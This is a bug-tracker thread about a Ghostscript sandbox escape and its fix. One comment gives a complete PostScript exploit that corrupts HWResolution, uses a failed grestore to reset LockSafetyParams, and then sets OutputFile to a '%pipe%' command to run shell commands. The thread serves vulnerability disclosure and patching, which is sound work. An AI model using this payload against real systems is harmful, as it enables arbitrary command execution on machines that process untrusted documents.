This has been moved from the never-ending bug #699654, the last comment in that thread demonstrates a similar issue to the original report, but using grestore instead of restore: ------------------------------------------------------------------------------- GS>currentpagedevice wcheck == false GS>currentpagedevice /HWResolution get wcheck == true You can't def HWResolution (for example), but you can just put or astore into it. If you put some junk in there, then grestore doesn't work: GS>a0 GS>currentpagedevice /HWResolution get 0 (foobar) put GS>grestore Error: /rangecheck in .installpagedevice Then LockSafetyParams is false again: GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop false That doesnt work with save (only gsave), so full exploit: a0 currentpagedevice /HWResolution get 0 (foobar) put { grestore } stopped {} if mark /OutputFile (%pipe%id) currentdevice putdeviceprops showpage
*** Bug 699697 has been marked as a duplicate of this bug. ***
I have a fix for this which I've asked Chris to review, especially to review any non-standard devices which might be vulnerable in the same way. I imagine we'll have a fix committed shortly.
Commit 7ba6d80c69f0c74601ffc1077d27e0d1a299e57f addresses this issue.